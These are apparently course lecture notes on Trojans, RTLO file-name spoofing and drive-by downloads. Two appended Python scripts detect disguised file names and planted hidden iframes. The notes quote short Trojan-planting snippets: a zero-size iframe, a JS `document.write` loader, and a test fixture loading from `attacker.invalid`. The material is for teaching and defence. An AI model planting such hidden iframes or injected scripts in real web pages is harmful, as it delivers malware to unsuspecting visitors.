---
title: The Attack and defense of computers listen 3 (9/30)
---

Computer Attack and Defense
===

###### tags: `電腦攻防` `Note`

- [Course information](https://hackmd.io/@Onebone/SkDTwUeBP/https%3A%2F%2Fhackmd.io%2F_tge1tPkTau8DDkZcIcMzg)
- [Question system](https://tlk.io/ncu-security-2020)
- [Previous Note 2020/09/23](https://hackmd.io/HYgyEZRwR--TZ3CNNQE_0A)
- [Note L4 10/07](https://hackmd.io/xOx4-bR3T0avQrC0Ny8Aiw?view)

# Categories of Trojan Horse

- A useful piece of software that has been corrupted by a cracker inserting malicious code that executes while the program is used.
    - Examples include various implementations of
        - weather alerting programs
        - computer clock setting software
        - peer-to-peer file sharing utilities.
- A standalone program that masquerades as something else, like a game or image file (e.g. **firework.jpg.exe** in **Windows**).

> Plants the malicious program into the system.

# Malware Parasitizes inside Trojan Horses

- spying (packet sniffer)
- backdoor

> A Trojan does not have to contain both of these to count as a Trojan, but it usually does.

# Unicode control character 202E file-extension spoofing (RTLO)

- This technique exploits the way the operating system interprets file names: when it meets a Unicode control character, it changes how the file name is displayed. An attacker can insert a specific Unicode control character into a file name so that the operating system misleads the user when it displays that name.
- e.g. Unicode control character 202E is an invisible control code that makes the characters after it display from right to left (Right To Left Override).
    - 大師兄[202E]gpj.exe (real filename)
    - 大師兄exe.jpg (displayed filename)

# Downloaded Files

- The infected program doesn't have to arrive via email, though; it can be
    - sent to you in an **Instant Message**
    - downloaded from a Web site or by **FTP**
    - delivered on a **CD**

# Precautions against Trojan Horses

- e-mail
- avoid P2P
    - Kazaa
    - Limewire
    - Ares
    - Gnutella

# Web page Trojan planting (drive-by download)

- Also called "hidden malicious links on web pages".
- The attacker first targets some vulnerability (usually a Windows or IE vulnerability) and designs a special web page for it (the Trojan page). When an ordinary user browses this page, the vulnerability is exploited to silently download the malicious program to the victim's computer and run it.

## Websites

- **IE**
    - Some of the IE bugs improperly handle data (such as **HTML** or **images**) by executing it as a legitimate program.
    - Attackers who find such vulnerabilities can then specially craft **a bit of malformed data** so that it contains a **valid program** to do their bidding.

## Features vs. Risks

- The more "features" a web browser has, the higher your risk of having security holes that can be exploited by an attacker.
- e.g.
    - **ActiveX** objects
    - some older versions of **Flash**
    - **Java**

## Dangerous Web Site

- The web site pointed to by the following URL is one containing the trap described in the previous slides.
- HTTP MSIE JavaScript OnLoad Rte CodeExec

# Web page Trojan-planting syntax

- Usually, after a page has been compromised through a **vulnerability** such as **SQL Injection**, the **Trojan-planting code** appears in **the first or the last line** of that page.

## iframe planting

- `<iframe src=木馬網址 width=0 height=0></iframe>`

## JScript file planting

- First save the following code as xxx.js
    - `document.write("<iframe width='0' height='0' src='木馬網址'></iframe>");`
- Then get the URL of this file onto the target page by whatever means are available.
- e.g.
    - `<script language=javascript src=xxx.js></script>`

# Spyware

- **Spyware** is computer software that is installed surreptitiously on a personal computer to
    - monitor
    - intercept
    - take partial control over
- the user's interaction with the computer, without the user's informed consent.
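The RTLO section above shows one disguised file name but not how a defender would catch it. The following Python script is an added example (not from the lecture notes): it scans file names for Unicode bidi control characters, approximates what a naive file browser would display, and reports when the real extension differs from the displayed one. The `displayed_name` rendering is a simplification (text after the first U+202E is reversed to the end of the string), which is enough to reproduce the `gpj.exe` / `exe.jpg` case from the notes; the sample file names are constructed.

```python
"""Detect file names that abuse Unicode bidi controls (e.g. U+202E RTLO)
to hide their real extension. Added example, not part of the lecture notes."""

# Bidi control characters that can change how a file name is rendered.
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF",
    "\u202d": "LRO", "\u202e": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
}


def strip_controls(s: str) -> str:
    """Remove all bidi control characters (what the file system really stores)."""
    return "".join(ch for ch in s if ch not in BIDI_CONTROLS)


def displayed_name(name: str) -> str:
    """Approximate a naive renderer: everything after the first U+202E is shown
    reversed; other bidi controls are simply invisible. (Simplified bidi model.)"""
    idx = name.find("\u202e")
    if idx == -1:
        return strip_controls(name)
    head = strip_controls(name[:idx])
    tail = strip_controls(name[idx + 1:])
    return head + tail[::-1]


def extension_of(name: str) -> str:
    """Lower-cased text after the last dot, or '' if there is no dot."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def analyze(name: str) -> dict:
    """Return the real vs. displayed view of a file name plus a suspicion flag."""
    controls = [(i, f"U+{ord(c):04X}", BIDI_CONTROLS[c])
                for i, c in enumerate(name) if c in BIDI_CONTROLS]
    real = strip_controls(name)
    shown = displayed_name(name)
    real_ext, shown_ext = extension_of(real), extension_of(shown)
    return {
        "real_name": real,
        "displayed_name": shown,
        "bidi_controls": controls,          # (index, codepoint, abbreviation)
        "real_extension": real_ext,
        "displayed_extension": shown_ext,
        # Any bidi control in a file name is unusual; a differing extension
        # is the classic RTLO disguise.
        "suspicious": bool(controls),
        "extension_mismatch": bool(controls) and real_ext != shown_ext,
    }


if __name__ == "__main__":
    # Constructed sample names; the first reproduces the notes' example.
    samples = ["大師兄\u202egpj.exe", "holiday.jpg", "invoice\u202efdp.scr"]
    for s in samples:
        r = analyze(s)
        print(f"stored={r['real_name']!r} shown={r['displayed_name']!r} "
              f"ext={r['real_extension']}/{r['displayed_extension']} "
              f"suspicious={r['suspicious']} mismatch={r['extension_mismatch']}")
```

A mail gateway or download handler can run `analyze` on each attachment name and quarantine anything with `extension_mismatch` set; rendering the stored name with the controls stripped (`real_name`) is what the user should be shown.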
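The Trojan-planting syntax section says the injected `<iframe>` or `<script src=...>` usually ends up on the first or last line of a compromised page. The following Python scanner is an added example (not from the lecture notes) a site owner could run over saved pages: it uses the standard library `html.parser` to find zero-size or hidden iframes and externally loaded scripts, records the line each one sits on, and marks findings that fall on the first or last line of the document. The sample HTML and the `attacker.invalid` host name are constructed for the demonstration.

```python
"""Scan saved HTML for planted hidden iframes / injected script tags.
Added example, not part of the lecture notes."""
from html.parser import HTMLParser


def _is_zero(value):
    """True for attribute values such as '0' or '0px'."""
    if value is None:
        return False
    v = value.strip().lower()
    if v.endswith("px"):
        v = v[:-2]
    try:
        return float(v) == 0
    except ValueError:
        return False


def _is_hidden(attrs):
    """Zero width/height or display:none is the signature of a planted iframe."""
    style = attrs.get("style", "").replace(" ", "").lower()
    return (_is_zero(attrs.get("width")) or _is_zero(attrs.get("height"))
            or "display:none" in style or "visibility:hidden" in style)


class PlantedTagScanner(HTMLParser):
    """Collect suspicious iframe/script start tags with their line numbers."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v if v is not None else "") for k, v in attrs}
        line, _ = self.getpos()          # line of the '<' that opened this tag
        if tag == "iframe" and _is_hidden(a):
            self.findings.append({"line": line, "kind": "hidden_iframe",
                                  "src": a.get("src", "")})
        elif tag == "script" and a.get("src"):
            self.findings.append({"line": line, "kind": "external_script",
                                  "src": a["src"]})


def scan_html(html: str) -> list:
    """Return findings; 'at_edge' marks the first/last line, where the notes
    say planted code usually appears, so those deserve review first."""
    scanner = PlantedTagScanner()
    scanner.feed(html)
    scanner.close()
    last_line = len(html.splitlines())
    for f in scanner.findings:
        f["at_edge"] = f["line"] == 1 or f["line"] == last_line
    return scanner.findings


# Constructed sample: a legitimate page with a planted iframe on line 1 and
# a planted external script on the last line (the pattern from the notes).
SAMPLE_PAGE = (
    "<iframe src=http://attacker.invalid/x.html width=0 height=0></iframe>\n"
    "<html>\n"
    "<body><h1>Hello</h1><script src=\"/static/app.js\"></script></body>\n"
    "</html>\n"
    "<script language=javascript src=xxx.js></script>"
)

if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE):
        flag = "!!" if f["at_edge"] else "  "
        print(f"{flag} line {f['line']}: {f['kind']} src={f['src']}")
```

External scripts are common on legitimate pages, so `external_script` alone is only a weak signal; the useful triage key is `at_edge` combined with a `src` that is not part of the site's own asset list. Running the scan on a known-good copy and diffing the findings against the live page turns it into a simple integrity check.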